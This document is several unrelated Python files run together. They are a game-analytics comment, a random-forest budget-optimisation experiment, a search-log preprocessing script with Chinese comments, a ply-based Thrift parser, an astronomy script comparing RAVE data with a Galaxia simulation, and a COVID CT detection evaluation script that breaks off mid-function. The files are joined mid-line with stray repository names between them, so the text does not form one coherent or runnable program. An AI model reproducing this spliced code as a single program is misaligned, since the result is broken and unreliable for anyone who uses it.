Using Datadog # we could certainly gather this data from millions of matches # and be able to monitor for statistical anomalies for all of # the hundreds of champions, items, and spells in the game. with open("event_interval.json", "w") as file: json.dump(event_list1, file) # We could also model the likelyhood of a victory or loss # by analyzing specific, but important, events that happen # in a match. For example a team is able to capture X objective # at Y timestamp, suddenly their odds of winning might increase # by 15%. Even further, it could also recommend courses of # action for the team based on historical data from these # matches. The possibilities are endless.from sklearn.ensemble import RandomForestRegressor from sklearn.datasets import make_regression import numpy as np import torch from budget import optimize_budget_multilinear, BudgetInstanceMultilinear, dgrad_budget import pickle from functools import partial from optmodel import ContinuousOptimizer #from multilinear_budget import dgrad_dparams import torch.nn as nn import random #max_depth = 50 num_iters = 30 opt_vals = {} kvals = [5, 10, 15, 20, 25, 30] #kvals = [30] #kval #algname = 'dt_{}'.format(max_depth) algname = 'dt_100' opt_vals[algname] = np.zeros((num_iters, len(kvals))) mse_vals = {} mse_vals[algname] = np.zeros((num_iters)) for idx in range(num_iters): def load_instance(n, i, num_targets): with open('new_budget_instances/yahoo_' + str(n) + '_' + str(i), 'rb') as f: Pfull, wfull = pickle.load(f, encoding='bytes') P = np.zeros((num_items, num_targets), dtype=np.float32) for i in range(num_targets): for j in Pfull[i]: P[j, i] = Pfull[i][j] P = torch.from_numpy(P).float() return P num_items = 100 num_targets = 500 num_iters = 40 test_pct = 0.2 num_instances = 500 total_instances = 500 instances_load = random.sample(range(total_instances), num_instances) Ps = [load_instance(num_items, i, num_targets) for i in instances_load] test = random.sample(range(num_instances), int(test_pct*num_instances)) train = [i for i in range(num_instances) if i not in test] w = np.ones(num_targets, dtype=np.float32) true_transform = nn.Sequential( nn.Linear(num_targets, num_targets), nn.ReLU(), nn.Linear(num_targets, num_targets), nn.ReLU(), nn.Linear(num_targets, num_targets), nn.ReLU(), ) data = [torch.from_numpy(true_transform(P).detach().numpy()).float() for P in Ps] loss_fn = nn.MSELoss() def get_test_mse(net): loss = 0 for i in test: pred = net(data[i]) loss += loss_fn(pred, Ps[i]) return loss/len(test) def get_train_mse(net): loss = 0 for i in train: pred = net(data[i]) loss += loss_fn(pred, Ps[i]) return loss/len(train) Xs = [] Ys = [] for i in train: Xs.append(data[i].detach().numpy()) Ys.append(Ps[i].detach().numpy()) X = np.vstack(Xs) Y = np.vstack(Ys) regr = RandomForestRegressor(n_estimators=100, n_jobs=36) pickle.dump([1,2,3], open('test.pickle', 'wb')) print('start fitting') regr.fit(X, Y) # pickle.dump(regr, open('networks/synthetic_dt_100_{}.pickle'.format(idx), 'wb')) def net_two_stage(data_instance): y = regr.predict(data_instance.detach().numpy()) return torch.from_numpy(y).float() mse_vals[algname][idx] = get_test_mse(net_two_stage) for kidx, k in enumerate(kvals): optfunc = partial(optimize_budget_multilinear, w = w, k=k, c = 0.95) #dgrad = partial(dgrad_dparams, w=w) dgrad = partial(dgrad_budget, w = w) opt = ContinuousOptimizer(optfunc, dgrad, None, 0.95) opt.verbose = False f_true = [BudgetInstanceMultilinear(P, w, True) for P in Ps] def eval_opt(net, instances): val = 0. 
for i in instances: pred = net(data[i]) x = opt(pred) val += f_true[i](x) return val/len(instances) opt_vals[algname][idx, kidx] = eval_opt(net_two_stage, test).item() print(idx, mse_vals[algname][idx], opt_vals[algname][idx, kidx]) pickle.dump((opt_vals, mse_vals), open('evaluation_budget_synthetic_{}.pickle'.format(algname), 'wb')) CDboyOne/IHGNN from typing import Type, Any, List, Dict, Set, Tuple, Union, Optional, Iterator, Iterable import os, sys, random, argparse sys.dont_write_bytecode = True sys.path.append('.') os.umask(0) from Helpers.PreProcessHelper import PreProcessHelper from Helpers.IOHelper import IOHelper from Helpers.SearchLog import RawSearchLog from Helpers.SearchLogCollection import RawSearchLogCollection # 决定是否生成针对 item 的 N-core 数据集。含义:从数据集中删去交互次数少于 N 的 item process_item_N_core = True # 以下两个选项不能全为 True # 决定是否生成针对 user 的 N-core 数据集。含义:从数据集中删去交互次数少于 N 的 user process_user_N_core = True # 决定是否从所有 user 中随机选取 N_sample_user 个 process_user_random_sample = False N_core_item = 5 N_core_user = 5 N_sample_user = 2_0000 source_folder = 'E:/DataScienceDataset/AlibabaAir/Intermediate/Complete5Core/' result_folder = 'E:/DataScienceDataset/AlibabaAir/Intermediate/Subset02W5Core/' source_folder = 'E:/DataScienceDataset/Cikm/Intermediate/WithCategory/' result_folder = 'E:/DataScienceDataset/Cikm/Intermediate/WithCategory5Core/' args = argparse.ArgumentParser() args.add_argument('--source', default='', type=str, help='源数据目录') args.add_argument('--result', default='', type=str, help='存储结果的目录') args.add_argument('--nitem', default=0, type=int) args.add_argument('--nuser', default=0, type=int) args.add_argument('--rand_user', default=0, type=int) args = args.parse_args() source_folder = args.source or source_folder result_folder = args.result or result_folder if args.nitem: process_item_N_core = True N_core_item = args.nitem if args.nuser: process_user_N_core = True process_user_random_sample = False N_core_user = args.nuser elif args.rand_user: process_user_random_sample = True process_user_N_core = False N_sample_user = args.rand_user else: if args.nitem: process_user_random_sample = False process_user_N_core = False assert(source_folder != result_folder) IOHelper.StartLogging(os.path.join(result_folder, 'PreProcess-Step2.txt')) if not os.path.exists(result_folder): os.makedirs(result_folder) # ------------------------- IOHelper.LogPrint() item_ids = [] item_title_segments = [] vocabulary_item = set() IOHelper.LogPrint('已有处理好的 item 数据,正在读取...') item_ids: List[str] = IOHelper.ReadStringListFromFile(os.path.join(source_folder, 'item_ids.txt')) item_title_segments: List[str] = IOHelper.ReadStringListFromFile(os.path.join(source_folder, 'item_title_segments.txt')) vocabulary_item: Set[str] = set(IOHelper.ReadStringListFromFile(os.path.join(source_folder, 'vocabulary_item.txt'))) IOHelper.LogPrint(f'完成,共 {len(item_ids)} 个 item。') # ------------------------- IOHelper.LogPrint() search_logs = RawSearchLogCollection() user_ids = [] queries = [] query_segments = [] vocabulary_query = set() IOHelper.LogPrint('已有处理好的 search 数据,正在读取...') user_ids: List[str] = IOHelper.ReadStringListFromFile(os.path.join(source_folder, 'user_ids.txt')) queries: List[str] = IOHelper.ReadStringListFromFile(os.path.join(source_folder, 'queries.txt')) query_segments: List[str] = IOHelper.ReadStringListFromFile(os.path.join(source_folder, 'query_segments.txt')) vocabulary_query: Set[str] = IOHelper.ReadStringListFromFile(os.path.join(source_folder, 'vocabulary_query.txt')) search_logs = 
RawSearchLogCollection.read(os.path.join(source_folder, 'search_logs_raw.csv')) IOHelper.LogPrint(f'完成,共 {len(search_logs)} 条 search log。') # ------------------------- IOHelper.LogPrint() IOHelper.LogPrint('正在采样子数据集...') if not os.path.exists(result_folder): os.makedirs(result_folder) item_ids_subset: Set[str] = set() user_ids_subset: Set[str] = set() # 产出一个集合 item_ids_subset # 过滤集合 search_logs if process_item_N_core: IOHelper.LogPrint(f'\n正在根据 item 的交互数量清洗数据...(最少 {N_core_item} 个)') # 记录所有 item 的交互数量 item_interaction_count_dict: Dict[str, int] = {item_id : 0 for item_id in item_ids} for log in search_logs: for id, flag in zip(log.item_ids, log.interactions): if flag > 0: item_interaction_count_dict[id] += 1 # 只保留交互数不少于 N 个的 item IOHelper.LogPrint(f'清洗前,每个 item 的平均交互数为:{sum(item_interaction_count_dict.values()) / len(item_interaction_count_dict)}') item_interaction_count_dict = {id : count for id, count in item_interaction_count_dict.items() if count >= N_core_item} IOHelper.LogPrint(f'清洗后,每个 item 的平均交互数为:{sum(item_interaction_count_dict.values()) / len(item_interaction_count_dict)}') item_ids_subset = set(item_interaction_count_dict.keys()) # 过滤 search logs IOHelper.LogPrint('正在清洗 search logs...') logs_temp = RawSearchLogCollection() for log in search_logs: log2 = log.subset(item_ids_subset) if len(log2.item_ids) > 0: logs_temp.append(log2) search_logs = logs_temp # 产出一个集合: # user_ids_subset if process_user_N_core: IOHelper.LogPrint(f'\n正在根据 user 的交互数量清洗数据...(最少 {N_core_user} 个)') # 记录所有 user 的交互数量 user_interaction_count_dict: Dict[str, int] = {user_id : 0 for user_id in user_ids} for log in search_logs: for flag in log.interactions: if flag > 0: user_interaction_count_dict[log.user_id] += 1 # 只保留交互数不少于 N 个的 user IOHelper.LogPrint(f'清洗前,每个 user 的平均交互数为:{sum(user_interaction_count_dict.values()) / len(user_interaction_count_dict)}') user_interaction_count_dict = {id : count for id, count in user_interaction_count_dict.items() if count >= N_core_user} IOHelper.LogPrint(f'清洗后,每个 user 的平均交互数为:{sum(user_interaction_count_dict.values()) / len(user_interaction_count_dict)}') user_ids_subset = set(user_interaction_count_dict.keys()) # 产出一个集合: # user_ids_subset if process_user_random_sample: IOHelper.LogPrint(f'\n正在随机选取 {N_sample_user} 个 user...') user_ids_subset = set(random.sample(user_ids, N_sample_user)) # 过滤集合 search_logs if process_user_N_core or process_user_random_sample: logs_temp = RawSearchLogCollection() for log in search_logs: if log.user_id in user_ids_subset: logs_temp.append(log) search_logs = logs_temp queries_segments_subset: Dict[str, str] = dict() vocabulary_query_subset: Set[str] = set() query_rdict = PreProcessHelper.GetReverseLookupDictionary(queries) # 如果针对 user 进行了筛选,那么 item_ids_subset 必须被重新计算 if process_user_N_core or process_user_random_sample: item_ids_subset = set() # 重建一些子集 for log in search_logs: if process_user_N_core or process_user_random_sample or (not process_item_N_core): item_ids_subset.update(log.item_ids) if (not process_user_N_core) and (not process_user_random_sample): user_ids_subset.add(log.user_id) if log.query not in queries_segments_subset.keys(): query_segment = query_segments[query_rdict[log.query]] queries_segments_subset[log.query] = query_segment vocabulary_query_subset.update(query_segment.split()) item_title_segments_subset = [] vocabulary_item_subset: Set[str] = set() item_ids_subset = list(item_ids_subset) item_id_rdict = PreProcessHelper.GetReverseLookupDictionary(item_ids) for id in item_ids_subset: segment = 
item_title_segments[item_id_rdict[id]] item_title_segments_subset.append(segment) vocabulary_item_subset.update(segment.split()) queries_subset = [] query_segments_subset = [] for query, segment in queries_segments_subset.items(): queries_subset.append(query) query_segments_subset.append(segment) IOHelper.LogPrint() IOHelper.WriteListToFile(item_ids_subset, os.path.join(result_folder, 'item_ids.txt')) IOHelper.WriteListToFile(item_title_segments_subset, os.path.join(result_folder, 'item_title_segments.txt')) IOHelper.WriteListToFile(vocabulary_item_subset, os.path.join(result_folder, 'vocabulary_item.txt')) search_logs.write(os.path.join(result_folder, 'search_logs_raw.csv')) IOHelper.WriteListToFile(user_ids_subset, os.path.join(result_folder, 'user_ids.txt')) IOHelper.WriteListToFile(queries_subset, os.path.join(result_folder, 'queries.txt')) IOHelper.WriteListToFile(query_segments_subset, os.path.join(result_folder, 'query_segments.txt')) IOHelper.WriteListToFile(vocabulary_query_subset, os.path.join(result_folder, 'vocabulary_query.txt')) IOHelper.LogPrint(f'采样完毕,共 {len(search_logs)} 条 search log。') IOHelper.EndLogging()from .ast import ( TypeAnnotation, # Container types Set, Map, List, # Basic types String, Binary, Slist, Bool, Byte, I16, I32, I64, Double, # Everything else Field, Function, Identifier, Service, Exception_, Struct, Const, Senum, Enum, EnumDef, Typedef, Include, Namespace, Thrift ) from .lexer import ( Lexer, Identifier as LexerIdentifier ) import ply.yacc as yacc class Parser(object): class Error(Exception): pass tokens = Lexer.tokens start = 'thrift' BASIC_TYPES = { 'binary': Binary, 'bool': Bool, 'byte': Byte, 'double': Double, 'i16': I16, 'i32': I32, 'i64': I64, 'slist': Slist, 'string': String, } @classmethod def default_action(cls, p, name=None): p[0] = ' '.join(map(str, filter(None, p[1:]))) if name: p[0] = '%s(%s)' % (name, p[0]) @classmethod def default_list_action(cls, p): if len(p) == 3: p[0] = (p[1] if p[1] else []) + [p[2]] else: p[0] = [] def p_empty(self, p): '''empty : ''' pass def p_thrift(self, p): '''thrift : header_list definition_list''' p[0] = Thrift(p) def p_header_list(self, p): '''header_list : header_list header | empty''' self.default_list_action(p) def p_header(self, p): '''header : include | NAMESPACE IDENTIFIER IDENTIFIER | NAMESPACE '*' IDENTIFIER | CPP_NAMESPACE IDENTIFIER | CPP_INCLUDE LITERAL | PHP_NAMESPACE IDENTIFIER | PY_MODULE IDENTIFIER | PERL_PACKAGE IDENTIFIER | RUBY_NAMESPACE IDENTIFIER | SMALLTALK_CATEGORY ST_IDENTIFIER | SMALLTALK_PREFIX IDENTIFIER | JAVA_PACKAGE IDENTIFIER | COCOA_PREFIX IDENTIFIER | XSD_NAMESPACE LITERAL | CSHARP_NAMESPACE IDENTIFIER | DELPHI_NAMESPACE IDENTIFIER''' if len(p) == 2: p[0] = p[1] else: p[0] = Namespace(p) def p_include(self, p): '''include : INCLUDE LITERAL''' p[0] = Include(p) def p_definition_list(self, p): '''definition_list : definition_list definition | empty''' self.default_list_action(p) def p_definition(self, p): '''definition : const | type_definition | service''' p[0] = p[1] def p_type_definition(self, p): '''type_definition : typedef | enum | senum | struct | exception''' p[0] = p[1] def p_typedef(self, p): '''typedef : TYPEDEF field_type IDENTIFIER type_annotations''' p[0] = Typedef(p) def p_comma_or_semicolon_optional(self, p): '''comma_or_semicolon_optional : ',' | ';' | empty''' self.default_action(p) def p_start_enum_counter(self, p): '''start_enum_counter : empty''' self._enum_counter = -1 def p_enum(self, p): '''enum : ENUM IDENTIFIER start_enum_counter '{' enum_def_list '}' 
type_annotations''' p[0] = Enum(p) def p_enum_def_list(self, p): '''enum_def_list : enum_def_list enum_def | empty''' self.default_list_action(p) def p_enum_def(self, p): '''enum_def : IDENTIFIER '=' INTCONSTANT type_annotations comma_or_semicolon_optional | IDENTIFIER type_annotations comma_or_semicolon_optional''' if p[2] == '=': self._enum_counter = p[3] else: self._enum_counter += 1 p[0] = EnumDef(p, self._enum_counter) def p_senum(self, p): '''senum : SENUM IDENTIFIER '{' senum_def_list '}' type_annotations''' p[0] = Senum(p) def p_senum_def_list(self, p): '''senum_def_list : senum_def | empty''' self.default_list_action(p) def p_senum_def(self, p): '''senum_def : LITERAL comma_or_semicolon_optional''' p[0] = p[1] def p_const(self, p): '''const : CONST field_type IDENTIFIER '=' const_value comma_or_semicolon_optional''' p[0] = Const(p) def p_const_value(self, p): '''const_value : INTCONSTANT | DUBCONSTANT | LITERAL | IDENTIFIER | const_list | const_map''' if isinstance(p[1], LexerIdentifier): p[1] = Identifier(p, 1) p[0] = p[1] def p_const_list(self, p): """const_list : '[' const_list_contents ']'""" p[0] = p[2] def p_const_list_contents(self, p): '''const_list_contents : const_list_contents const_value comma_or_semicolon_optional | empty''' p[0] = p[1] or [] if len(p) > 2: p[0].append(p[2]) def p_const_map(self, p): """const_map : '{' const_map_contents '}'""" p[0] = p[2] def p_const_map_contents(self, p): '''const_map_contents : const_map_contents const_value ':' const_value comma_or_semicolon_optional | empty''' # TODO(wickman) if this implies hashable lists/maps we should probably store lists as tuples # and maps as a tuple of tuples. p[0] = p[1] or {} if len(p) > 4: p[0][p[2]] = p[4] def p_struct_head(self, p): '''struct_head : STRUCT | UNION''' p[0] = p[1] def p_struct(self, p): '''struct : struct_head IDENTIFIER xsd_all '{' field_list '}' type_annotations''' p[0] = Struct(p) def p_xsd_all(self, p): '''xsd_all : XSD_ALL | empty''' p[0] = p[1] == 'xsd_all' def p_xsd_optional(self, p): '''xsd_optional : XSD_OPTIONAL | empty''' p[0] = p[1] == 'xsd_optional' def p_xsd_nillable(self, p): '''xsd_nillable : XSD_NILLABLE | empty''' p[0] = p[1] == 'xsd_nillable' def p_xsd_attributes(self, p): '''xsd_attributes : XSD_ATTRS '{' field_list '}' | empty''' p[0] = p[3] if p[1] else [] def p_exception(self, p): '''exception : EXCEPTION IDENTIFIER '{' field_list '}' type_annotations''' p[0] = Exception_(p) def p_service(self, p): '''service : SERVICE IDENTIFIER extends '{' flag_args function_list unflag_args '}' type_annotations''' p[0] = Service(p) def p_flag_args(self, p): '''flag_args : empty''' pass def p_unflag_args(self, p): '''unflag_args : empty''' pass def p_extends(self, p): '''extends : EXTENDS IDENTIFIER | empty''' p[0] = p[2] if p[1] else None def p_function_list(self, p): '''function_list : function_list function | empty''' self.default_list_action(p) def p_function(self, p): '''function : oneway function_type IDENTIFIER '(' field_list ')' throws type_annotations comma_or_semicolon_optional''' p[0] = Function(p) def p_oneway(self, p): '''oneway : ONEWAY | empty''' p[0] = p[1] == 'oneway' def p_throws(self, p): '''throws : THROWS '(' field_list ')' | empty''' p[0] = p[3] if p[1] else [] def p_field_list(self, p): '''field_list : field_list field | empty''' self.default_list_action(p) def p_field(self, p): '''field : field_identifier field_requiredness field_type IDENTIFIER field_value xsd_optional xsd_nillable xsd_attributes type_annotations comma_or_semicolon_optional''' p[0] = 
Field(p) def p_field_identifier(self, p): '''field_identifier : INTCONSTANT ':' | empty''' p[0] = p[1] def p_field_requiredness(self, p): '''field_requiredness : REQUIRED | OPTIONAL | empty''' p[0] = p[1] == 'required' def p_field_value(self, p): '''field_value : '=' const_value | empty''' p[0] = p[2] if p[1] else None def p_function_type(self, p): '''function_type : field_type | VOID''' p[0] = p[1] def p_field_type(self, p): '''field_type : IDENTIFIER | base_type | container_type''' if isinstance(p[1], LexerIdentifier): p[1] = Identifier(p, 1) p[0] = p[1] def p_base_type(self, p): '''base_type : simple_base_type type_annotations''' p[0] = p[1] p[0].add_annotations(p[2]) def p_simple_base_type(self, p): '''simple_base_type : STRING | BINARY | SLIST | BOOL | BYTE | I16 | I32 | I64 | DOUBLE''' p[0] = self.BASIC_TYPES[p[1]](p) def p_container_type(self, p): '''container_type : simple_container_type type_annotations''' p[0] = p[1] p[0].add_annotations(p[2]) def p_simple_container_type(self, p): '''simple_container_type : map_type | set_type | list_type''' p[0] = p[1] def p_map_type(self, p): """map_type : MAP cpp_type '<' field_type ',' field_type '>'""" p[0] = Map(p) def p_set_type(self, p): """set_type : SET cpp_type '<' field_type '>'""" p[0] = Set(p) def p_list_type(self, p): """list_type : LIST '<' field_type '>' cpp_type""" p[0] = List(p) def p_cpp_type(self, p): '''cpp_type : CPP_TYPE LITERAL | empty''' p[0] = p[2] if p[1] else None def p_type_annotations(self, p): '''type_annotations : '(' type_annotation_list ')' | empty''' p[0] = p[2] if p[1] else [] def p_type_annotation_list(self, p): '''type_annotation_list : type_annotation_list type_annotation | empty''' self.default_list_action(p) def p_type_annotation(self, p): '''type_annotation : IDENTIFIER '=' LITERAL comma_or_semicolon_optional''' p[0] = TypeAnnotation(p) def p_error(self, p): raise self.Error('Parse error: %s' % p) def __init__(self): self._lex = Lexer().build() self._yacc = yacc.yacc(module=self, write_tables=False, debug=False) def parse(self, data): return self._yacc.parse(data, lexer=self._lex, tracking=True) kcotar/Aquarius_membership import imp import astropy.units as un import astropy.coordinates as coord import matplotlib.pyplot as plt import gala.coordinates as gal_coord from astropy.table import Table from vector_plane_calculations import * from velocity_transformations import * imp.load_source('helper', '../tSNE_test/helper_functions.py') from helper import move_to_dir imp.load_source('gal_move', '../tSNE_test/convert_gal_movement.py') from gal_move import gal_uvw imp.load_source('veltrans', '../tSNE_test/velocity_transform.py') from veltrans import * # -------------------------------------------------------- # ---------------- FUNCTIONS ----------------------------- # -------------------------------------------------------- def _prepare_hist_data(d, bins, range, norm=True): heights, edges = np.histogram(d, bins=bins, range=range) width = np.abs(edges[0] - edges[1]) if norm: heights = 1.*heights / np.max(heights) return edges[:-1], heights, width def _get_range(data, perc_cut=2.): return (np.nanpercentile(data, perc_cut), np.nanpercentile(data, 100-perc_cut)) # return (np.nanmin(data), np.nanmax(data)) def plot_hist(obs, obs_f, galx, galx_f, path=None, title='', hist_bins = 100): hist_range = _get_range(obs[obs_f]) # zgal_range = _get_range(galaxia_sub['pz']) plt.title(title) h_edg, h_hei, h_wid = _prepare_hist_data(obs[obs_f], hist_bins, hist_range, norm=True) plt.bar(h_edg, h_hei, width=h_wid, color='green', 
alpha=0.2) h_edg, h_hei, h_wid = _prepare_hist_data(galx[galx_f], hist_bins, hist_range, norm=True) plt.bar(h_edg, h_hei, width=h_wid, color='blue', alpha=0.2) plt.show() plt.close() # -------------------------------------------------------- # ---------------- CONSTANTS AND SETTINGS ---------------- # -------------------------------------------------------- # GALAH # simulation_dir = '/home/klemen/GALAH_data/Galaxia_simulation/GALAH/' # simulation_ebf = 'galaxy_galah_complete.ebf' # simulation_ebf = 'galaxy_galah_fields.ebf' # RAVE simulation_dir = '/home/klemen/GALAH_data/Galaxia_simulation/RAVE/' simulation_ebf = 'galaxy_rave_complete.ebf' simulation_fits = simulation_ebf.split('.')[0]+'.fits' obs_file_fits = 'RAVE_GALAH_TGAS_stack.fits' # analysis constants l_center = 310. b_center = -70. r_center = 10. # -------------------------------------------------------- # ---------------- INPUT DATA HANDLING ------------------- # -------------------------------------------------------- print 'Reading data' glaxia_data = Table.read(simulation_dir + simulation_fits) obs_data = Table.read(obs_file_fits) obs_data = obs_data.filled() # compute observation galactic coordinates l_b_obs = coord.ICRS(ra=obs_data['ra_gaia']*un.deg, dec=obs_data['dec_gaia']*un.deg).transform_to(coord.Galactic) obs_data['l'] = l_b_obs.l.value obs_data['b'] = l_b_obs.b.value # create a subset of data lb_center = coord.Galactic(l=l_center*un.deg, b=b_center*un.deg) xyz_vel_stream = compute_xyz_vel(np.deg2rad(lb_center.l.value), np.deg2rad(lb_center.b.value), 10) galaxia_sub = glaxia_data[coord.Galactic(l=glaxia_data['glon']*un.deg, b=glaxia_data['glat']*un.deg).separation(lb_center) < r_center*un.deg] obs_sub = obs_data[coord.Galactic(l=obs_data['l']*un.deg, b=obs_data['b']*un.deg).separation(lb_center) < r_center*un.deg] print 'Galaxia stars: '+str(len(galaxia_sub)) print 'Observation stars: '+str(len(obs_sub)) galaxia_sub['px'] *= 1e3 # kpc to pc conversion galaxia_sub['py'] *= 1e3 galaxia_sub['pz'] *= 1e3 # galaxia_sub['vx'] *= -1. # it has different orientation than our coordinate system # compute galactic velocities and positions for the obs stars obs_gal_coord = coord.Galactic(l=obs_sub['l']*un.deg, b=obs_sub['b']*un.deg, distance=1e3/obs_sub['parallax'].data*un.pc) obs_gal_xyz = obs_gal_coord.cartesian obs_sub['x_gal'] = obs_gal_xyz.x.value obs_sub['y_gal'] = obs_gal_xyz.y.value obs_sub['z_gal'] = obs_gal_xyz.z.value plot_hist(obs_sub, 'x_gal', galaxia_sub, 'px', path=None, title='') plot_hist(obs_sub, 'y_gal', galaxia_sub, 'py', path=None, title='') plot_hist(obs_sub, 'z_gal', galaxia_sub, 'pz', path=None, title='') # convert velocities from ra/de/pmra/pmdec to more consisten units u_gal, v_gal, w_gal = gal_uvw(obs_sub['ra_gaia'], obs_sub['dec_gaia'], obs_sub['pmra'], obs_sub['pmdec'], obs_sub['RV'], plx=obs_sub['parallax']) obs_sub['u_gal'] = u_gal * -1. 
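# --- Illustrative aside (not part of the original pipeline) -------------------
# The sign flip on u_gal above reflects differing U-axis conventions between
# gal_uvw and the frame used for comparison with Galaxia. A hedged cross-check
# sketch using astropy's space-motion support (a reasonably recent astropy is
# assumed); the input numbers are made up for illustration:
#   star = coord.SkyCoord(ra=10.0*un.deg, dec=-20.0*un.deg, distance=150.0*un.pc,
#                         pm_ra_cosdec=5.0*un.mas/un.yr, pm_dec=-3.0*un.mas/un.yr,
#                         radial_velocity=12.0*un.km/un.s)
#   v_gal_cart = star.galactic.velocity   # CartesianDifferential (d_x, d_y, d_z)
#   print(v_gal_cart.d_x, v_gal_cart.d_y, v_gal_cart.d_z)
# Whether d_x corresponds to +U or -U depends on the adopted convention, which
# is why u_gal is negated before being compared with Galaxia's vx.
# -------------------------------------------------------------------------------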
obs_sub['v_gal'] = v_gal obs_sub['w_gal'] = w_gal ra_dec_pm = np.vstack((obs_sub['pmra'], obs_sub['pmdec'])) * un.mas/un.yr l_b_pm = gal_coord.pm_icrs_to_gal(coord.ICRS(ra=obs_sub['ra_gaia']*un.deg, dec=obs_sub['dec_gaia']*un.deg), ra_dec_pm) obs_sub['pml'] = l_b_pm[0].value obs_sub['pmb'] = l_b_pm[1].value xyz_vel = motion_to_cartesic(np.array(obs_sub['l']), np.array(obs_sub['b']), np.array(obs_sub['pml']), np.array(obs_sub['pmb']), np.array(obs_sub['RV']), plx=np.array(obs_sub['parallax'])) obs_sub['vx_gal'] = xyz_vel[0] obs_sub['vy_gal'] = xyz_vel[1] obs_sub['vz_gal'] = xyz_vel[2] # plot_hist(obs_sub, 'u_gal', obs_sub, 'vx_gal', path=None, title='') # plot_hist(obs_sub, 'v_gal', obs_sub, 'vy_gal', path=None, title='') # plot_hist(obs_sub, 'w_gal', obs_sub, 'vz_gal', path=None, title='') plot_hist(obs_sub, 'u_gal', galaxia_sub, 'vx', path=None, title='') plot_hist(obs_sub, 'v_gal', galaxia_sub, 'vy', path=None, title='') plot_hist(obs_sub, 'w_gal', galaxia_sub, 'vz', path=None, title='') xyz_pos_stars = np.vstack((obs_sub['x_gal'],obs_sub['y_gal'],obs_sub['z_gal'])).T xyz_vel_stars = np.vstack((obs_sub['u_gal'],obs_sub['v_gal'],obs_sub['w_gal'])).T print xyz_pos_stars print xyz_vel_stars print xyz_vel_stream obs_plane_intersects_3D = stream_plane_vector_intersect(xyz_pos_stars, xyz_vel_stars, xyz_vel_stream) obs_plane_intersects_2D = intersects_to_2dplane(obs_plane_intersects_3D, xyz_vel_stream) xyz_pos_stars = np.vstack((galaxia_sub['px'],galaxia_sub['py'],galaxia_sub['pz'])).T xyz_vel_stars = np.vstack((galaxia_sub['vx'],galaxia_sub['vy'],galaxia_sub['vz'])).T galaxia_plane_intersects_3D = stream_plane_vector_intersect(xyz_pos_stars, xyz_vel_stars, xyz_vel_stream) galaxia_plane_intersects_2D = intersects_to_2dplane(galaxia_plane_intersects_3D, xyz_vel_stream) plot_lim = (-1000, 1000) # Create a plot fig, ax = plt.subplots(1, 1) ax.scatter(obs_plane_intersects_2D[:, 0], obs_plane_intersects_2D[:, 1], lw=0, c='red', s=2, alpha=1.) ax.scatter(galaxia_plane_intersects_2D[:, 0], galaxia_plane_intersects_2D[:, 1], lw=0, c='blue', s=2, alpha=1.) ax.scatter(0, 0, lw=0, c='black', s=10, marker='*') # solar position ax.set(xlabel='X stream plane', ylabel='Y stream plane', xlim=plot_lim, ylim=plot_lim) fig.tight_layout() plt.show() plt.close() 10-100 #!/usr/bin/env python import argparse import os import sys import csv import h5py import tensorflow.keras as keras import tensorflow as tf import numpy as np from tqdm import tqdm import cv2 import SimpleITK as sitk import time tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR) tf.compat.v1.enable_v2_behavior() if __name__ == "__main__" and __package__ is None: sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..', '..')) import fl_covid.bin # noqa: F401 __package__ = "fl_covid.bin" # Change these to absolute imports if you copy this script outside the fl_covid package. from ..utils.anchors import compute_overlap from .. 
import models from ..preprocessing.csv_generator import CSVGenerator from ..utils.eval import _compute_ap, _get_annotations, _get_annotations_and_img_path from ..utils.config import read_config_file, parse_anchor_parameters from ..utils.keras_version import check_keras_version from ..utils.visualization import draw_detections, draw_annotations from keras_retinanet.utils.visualization import draw_box, label_color, draw_caption from keras_retinanet.bin.train_edit import create_models from keras_retinanet.layers.filter_detections import filter_detections from keras_retinanet.utils.image import preprocess_image, resize_image from keras_retinanet.bin.evaluate_internal_patient_wise import draw_colorful_result, evaluate_from_npy def get_session(): """ Construct a modified tf session. """ config = tf.ConfigProto() config.gpu_options.allow_growth = True return tf.Session(config=config) def draw_detections(image, boxes, scores, labels, color=None, label_to_name=None, slice_id=None, bbox_writer=None, score_threshold=0.4): # score_threshold used to be 0.5 """ Draws detections in an image. # Arguments image : The image to draw on. boxes : A [N, 4] matrix (x1, y1, x2, y2). scores : A list of N classification scores. labels : A list of N labels. color : The color of the boxes. By default the color from keras_retinanet.utils.colors.label_color will be used. label_to_name : (optional) Functor for mapping a label to a name. score_threshold : Threshold used for determining what detections to draw. """ selection = np.where(scores > score_threshold)[0] for i in selection: c = color if color is not None else label_color(labels[i]) if bbox_writer is not None and slice_id is not None: tar_path = 'slice_{}.png'.format(slice_id) b = np.array(boxes[i, :]).astype(int) bbox_writer.writerow([tar_path]+ [b[0],b[1],b[2],b[3]]+['lesion']) draw_box(image, boxes[i, :], color=c) # draw labels caption = (label_to_name(labels[i]) if label_to_name else str(labels[i])) + ': {0:.2f}'.format(scores[i]) draw_caption(image, boxes[i, :], caption) def create_generator(args): """ Create generators for evaluation. 
""" if args.dataset_type == 'csv': validation_generator = CSVGenerator( args.annotations, args.classes, image_min_side=args.image_min_side, image_max_side=args.image_max_side, config=args.config, shuffle_groups=False ) else: raise ValueError('Invalid data type received: {}'.format(args.dataset_type)) return validation_generator def _seg_filter(bboxes,scores_sort,seg): # print('scores_sort') # print(scores_sort.shape) # print(scores_sort) # print('indices') # print(type(indices[scores_sort])) # print(indices[scores_sort]) # print(indices) # # select detections # image_boxes = boxes[0, indices[scores_sort], :] # print('seletec_boxes', image_boxes.shape) # print(type(image_boxes)) # print(image_boxes) # image_boxes_filtered = [] # seg = cv2.imread('/Users/jemary/Data/DataSet/COVID-19/COVID-19 image data collection(public1)/007_seg/slice_seg_{}.png'.format(img_idx)) # print(seg.shape) image_boxes = bboxes inner = np.asarray([],dtype=np.bool) flag = False for i in range(image_boxes.shape[0]): x1 = int(image_boxes[i][0]) y1 = int(image_boxes[i][1]) x2 = int(image_boxes[i][2]) y2 = int(image_boxes[i][3]) x1 = 511 if x1 > 511 else x1 y1 = 511 if y1 > 511 else y1 x2 = 511 if x2 > 511 else x2 y2 = 511 if y2 > 511 else y2 # print(scores_sort) # print(scores_sort.shape) if (seg[y1,x1,:] == 0).all() and (seg[y2,x2,:] == 0).all() and (seg[y1,x2,:] == 0).all() and (seg[y2,x1,:] == 0).all(): inner = np.append(inner,False) flag=True # scores_sort = np.delete(scores_sort,i,axis=0) else: inner = np.append(inner, True) # print(inner) # cnt = 1 # if flag: # if cnt > 0: # print("FP out of lung filtered") # cnt -= 1 scores_sort = scores_sort[inner] # print('scores_sort after filter') # 